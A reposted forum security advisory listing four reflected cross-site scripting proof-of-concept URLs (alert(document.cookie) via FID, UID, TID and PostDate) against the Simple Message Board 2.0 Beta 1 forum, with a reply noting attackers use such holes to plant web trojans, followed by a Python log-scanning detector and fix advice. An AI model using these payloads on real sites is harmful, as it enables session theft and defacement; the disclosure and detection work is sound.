[Repost] XSS in forums Simple Message Board Version 2.0 Beta 1
Author: rUnViRuS  Source: [url]www.security-arab.com[/url]
xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit
XSS in forum.cfm
[url]http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script>[/url]
XSS in user.cfm
[url]http://www.example.com/forum/user.cfm?UID=<script>JavaScript:alert(document.cookie);</script>[/url]
XSS in thread.cfm
[url]http://www.example.com/forum/thread.cfm?TID=<script>JavaScript:alert(document.cookie);</script>[/url]
XSS IN search.cfm
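[url]http://www.example.com/forum/search.cfm?PostDate=<script>JavaScript:alert(document.cookie);</script>[/url]

You're kidding~? Boss~~~ it needs translating too~?
Simple Message Board is a small forum program from Russia~
Pages such as forum.cfm contain CSS/XSS cross-site scripting vulnerabilities
In China these are usually used for planting web trojans on pages and for minor vandalism~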
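
An added detection example (not part of the original advisory or the reply): it scans web-server access logs for requests to the four pages listed above whose FID, UID, TID or PostDate value is not a plain id or date. The expected value formats, the log format and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Page -> (parameter, pattern a legitimate value must fully match).
# Assumption: FID/UID/TID are integer ids and PostDate is a date; the
# advisory names the parameters but not their expected formats.
EXPECTED = {
    "forum.cfm": ("FID", re.compile(r"\d{1,10}")),
    "user.cfm": ("UID", re.compile(r"\d{1,10}")),
    "thread.cfm": ("TID", re.compile(r"\d{1,10}")),
    "search.cfm": ("PostDate", re.compile(r"\d{1,4}[-/]\d{1,2}[-/]\d{1,4}")),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return (page, parameter, decoded value) for values failing the allow-list."""
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1].lower()
    if page not in EXPECTED:
        return []
    name, pattern = EXPECTED[page]
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != name.lower():  # ColdFusion URL keys are case-insensitive
            continue
        decoded = unquote(value)  # second decode catches double-encoded markup
        if not pattern.fullmatch(decoded):
            hits.append((page, name, decoded))
    return hits

def scan_log(lines):
    """Collect findings from access-log lines in common/combined log format."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            findings.extend(suspicious_params(match.group(1)))
    return findings

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2006:10:00:00 +0000] "GET /forum/forum.cfm?FID=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2006:10:00:05 +0000] "GET /forum/forum.cfm?FID=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] "GET /forum/search.cfm?PostDate=2006-01-01 HTTP/1.1" 200 801',
    '203.0.113.9 - - [01/Jan/2006:10:00:12 +0000] "GET /forum/user.cfm?UID=%253Cscript%253E HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same per-parameter allow-list, enforced server-side before the value is echoed and combined with HTML-encoding on output, is the corresponding fix.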